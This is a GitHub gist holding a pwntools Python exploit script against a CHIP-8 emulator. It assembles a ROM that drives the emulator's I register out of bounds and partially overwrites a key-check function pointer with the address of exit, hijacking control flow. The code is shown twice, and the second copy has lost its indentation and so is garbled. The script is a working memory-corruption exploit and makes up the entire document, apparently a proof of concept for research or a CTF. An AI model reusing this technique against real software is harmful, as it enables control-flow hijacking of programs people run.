DavidBuchanan314/exploit_danirod_exploit3.py Secret

## exploit_danirod_exploit3.py
from pwn import *

def set_reg(reg, value):
	return 0x6000 | (reg << 8) | value

def add_i(reg):
	return 0xF01E | (reg << 8)

def add_reg_byte(reg, byte):
	return 0x7000 | (reg << 8) | byte

def jump(addr):
	return lambda symbols: 0x1000 | symbols.get(addr, addr)

def store_regs_at_i(lastreg):
	return 0xF055 | (lastreg << 8)

def skip_if_reg_equals_byte(reg, byte):
	return 0x3000 | (reg << 8) | byte

elf = ELF("./chip8")

program = [
	# we want to set I to 0x3040
	# 0x3040 = 193 * 64
	set_reg(0xc, 193),
"add_i_loop",
	add_i(0xc), # I += Vc
	add_reg_byte(0xe, 1), # Ve += 1
	skip_if_reg_equals_byte(0xe, 64),
	jump("add_i_loop"),

	set_reg(0, elf.plt.exit & 0xff),
	set_reg(1, (elf.plt.exit >> 8) & 0xff),
	store_regs_at_i(1), # partial overwrite key check function pointer

	set_reg(3, 3),
	0xE39E, # "skip next if key 3 is pressed"
]

# "assemble" the ROM
symbols = {}
flat_program = []
for thing in program:
	if type(thing) is str:
		symbols[thing] = 0x200 + len(flat_program) * 2
	else:
		flat_program.append(thing)

rom = b"".join([(x if type(x) is int else x(symbols)).to_bytes(2, "big") for x in flat_program])
log.info(f"Assembled ROM size: {len(rom)}")
open("exploit.rom", "wb").write(rom)

# start up the emulator
p = process(["./chip8", "exploit.rom"])#, env={"DISPLAY": ":0"})
p.recvall()
	from pwn import *

	def set_reg(reg, value):
	return 0x6000 \| (reg << 8) \| value

	def add_i(reg):
	return 0xF01E \| (reg << 8)

	def add_reg_byte(reg, byte):
	return 0x7000 \| (reg << 8) \| byte

	def jump(addr):
	return lambda symbols: 0x1000 \| symbols.get(addr, addr)

	def store_regs_at_i(lastreg):
	return 0xF055 \| (lastreg << 8)

	def skip_if_reg_equals_byte(reg, byte):
	return 0x3000 \| (reg << 8) \| byte

	elf = ELF("./chip8")

	program = [
	# we want to set I to 0x3040
	# 0x3040 = 193 * 64
	set_reg(0xc, 193),
	"add_i_loop",
	add_i(0xc), # I += Vc
	add_reg_byte(0xe, 1), # Ve += 1
	skip_if_reg_equals_byte(0xe, 64),
	jump("add_i_loop"),

	set_reg(0, elf.plt.exit & 0xff),
	set_reg(1, (elf.plt.exit >> 8) & 0xff),
	store_regs_at_i(1), # partial overwrite key check function pointer

	set_reg(3, 3),
	0xE39E, # "skip next if key 3 is pressed"
	]

	# "assemble" the ROM
	symbols = {}
	flat_program = []
	for thing in program:
	if type(thing) is str:
	symbols[thing] = 0x200 + len(flat_program) * 2
	else:
	flat_program.append(thing)

	rom = b"".join([(x if type(x) is int else x(symbols)).to_bytes(2, "big") for x in flat_program])
	log.info(f"Assembled ROM size: {len(rom)}")
	open("exploit.rom", "wb").write(rom)

	# start up the emulator
	p = process(["./chip8", "exploit.rom"])#, env={"DISPLAY": ":0"})
	p.recvall()